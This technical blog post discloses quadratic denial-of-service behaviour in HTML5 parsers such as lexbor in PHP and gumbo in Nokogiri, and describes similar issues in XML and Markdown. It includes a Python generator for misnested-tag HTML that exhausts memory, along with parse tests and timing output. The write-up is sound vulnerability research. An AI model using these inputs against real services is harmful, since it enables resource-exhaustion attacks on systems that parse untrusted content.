Parsing HTML5 is more dangerous than you think

When parsing files in any kind of format, most people assume that a parser behaves linearly in the size of the file being read. In other words, if parsing a 1 MB file takes 10 milliseconds, you'd expect a 1 GB file to be parsed in roughly 10 seconds. Unfortunately, this assumption is sometimes wrong. A well-known example is the “billion laughs” attack against XML. This involves XML entities which are essentially macros. Expanding macros can trivially lead to super-linear behavior, in case of billion laughs even to exponential behavior.

In this article, I want to point out that HTML5 has similar problems. HTML5 is a complex specification, mostly because it tries to handle broken HTML in a sensible way. A typical example are misnested tags:

<b>one <i>two</b> three</i>

Here we encounter a start tag  followed by an end tag  that doesn't match. If you parse this snippet, an HTML5 parser will transform it into a parse tree matching

<b>one <i>two</i></b><i> three</i>

This behavior makes total sense and can be verified by evaluating the following Javascript expression in your browser:

new DOMParser().parseFromString(
    '<b>one <i>two</b> three</i>',
    'text/html'
).documentElement.outerHTML

To handle the misnested  end tag, the HTML5 spec essentially mandates to close the  tag as well, and reconstruct the active formatting elements afterwards. This can be abused to cause quadratic behavior in every conforming HTML5 parser. Consider the following HTML:

<b class="x"><b class="y"><b class="z">
<i class="x"><i class="y"><i class="z">
x</b>x</b>x</b>

After each misnested  end tag, the parser has to close and reopen all the  tags. So if you repeat the  and  tags N times, you end up with N² tags overall. Here's a simple Python script that generates such malicious HTML:

import sys

n = int(sys.argv[1])

for i in range(n):
    print(f'<b {i}>', end='')

for i in range(n):
    print(f'<i {i}>', end='')

for i in range(n):
    print('x</b>', end='')

The start tags must differ in their attributes, otherwise the somewhat weird Noah's Ark clause makes the parser ignore open formatting elements. Running the script above with sizes 1,000, 10,000 and 100,000 results in file sizes of roughly 20, 200 and 2,000 KB. Opening the first file should, in theory, result in 1,000² or one million HTML elements being created. The second file creates 100 million and the third one 10 billion elements. Larger inputs will result in trillions of elements, assuming a machine with unlimited resources.

So what happens if you open such files in a web browser? It obviously depends, but on macOS Safari the largest file will cause a CPU core to run at full capacity for minutes, increase memory usage by a couple of GB until (at a guess) the browser runs into an internal limit and will stop further processing.

All of this might look like a security issue, but at least in the context of modern web browsers it isn't. After all, these marvelous pieces of engineering allow to run untrusted Javascript code which makes it trivial to consume an excessive amount of resources by other means. Everything is sandboxed and the browser can simply abort if too much memory or CPU is used.

But how do offline parsers handle such files? Let's try some popular “scripting” languages and the underlying C libraries. Historically, many of these languages offered modules that used libxml2 to parse HTML under the hood, but libxml2 doesn't support HTML5. Luckily, other options are available these days.

Let's start with PHP which, as of version 8.4, supports parsing HTML5 using the lexbor library. With the test cases above, you'll quickly exceed PHP's default memory limit, so let's disable that:

<?php
ini_set("memory_limit", "-1");
$doc = Dom\HTMLDocument::createFromFile(
    $argv[1],
    LIBXML_NOERROR
);

The first file with 1,000 tags already takes 0.3 seconds to parse:

$ time php parse.php html5-dos-1000.html 

real	0m0.382s
user	0m0.279s
sys	0m0.102s

Since we're dealing with quadratic behavior, we'd expect the second file with 10x the number of tags to take at least 100x more time. But on my machine with 32 GB of RAM, it takes several minutes, consuming all available memory until the process is terminated by the Linux OOM killer:

$ time php parse.php html5-dos-10000.html 
Killed                     php parse.php html5-dos-10000.html

real	9m58.125s
user	9m43.038s
sys	0m8.649s

Note that, as mentioned above, this is just a ~200KB file. In conclusion, it's trivial to exhaust all available memory when letting PHP parse untrusted HTML5.

Now let's have a look at the Nokogiri Ruby gem which supports HTML5 via the gumbo library for quite a while.

require 'nokogiri'
doc = Nokogiri::HTML5(File.open(ARGV[0]))

$ ruby parse.rb html5-dos-1000.html
/usr/lib/ruby/gems/3.4.0/gems/nokogiri-1.18.9/lib/nokogiri/html5/document.rb:153:in 'Nokogiri::Gumbo.parse': Document tree depth limit exceeded (ArgumentError)

That's a lot better. Limiting the depth of the document tree is a good way to avoid resource exhaustion caused by such issues and it's unlikely that users raise this limit manually. If we raise the maximum depth to one million, we get results similar to PHP:

require 'nokogiri'
doc = Nokogiri::HTML5(
    File.open(ARGV[0]),
    max_tree_depth: 1000000
)

$ time ruby parse.rb html5-dos-1000.html 

real	0m0.995s
user	0m0.834s
sys	0m0.160s

$ time ruby parse.rb html5-dos-10000.html 
Killed                     ruby parse.rb html5-dos-10000.html

real	1m42.733s
user	1m37.020s
sys	0m5.588s

As far as I'm aware, lexbor and gumbo are the only options if you're looking for a C library to parse HTML5 and I'd expect other language bindings to these libraries to behave similarly. Unfortunately, lexbor doesn't have an option to guard against malicious HTML5, but it seems to me that such protection would be useful.

Other file formats

I already mentioned the billion laughs attack against XML, but there's another part of the spec that makes XML parsing quadratic by design. While I mitigated the issue in libxml2, the popular Expat library is still vulnerable and I don't want to disclose the details until the defect is fixed.

Markdown also suffers from a quadratic-by-design issue when handling reference links. Consider the following Markdown input:

[link]
[link]
[link]
[link]
...

[link]: /an-extremely-long-link/an-extremely-long-link/...

You can simply create an extremely long link and cause the parser to insert the link over and over again with a link label of just a few bytes. In essence, this is just another example of macro-like expansion. I mitigated the issue in libcmark, the reference CommonMark implementation, in 2020.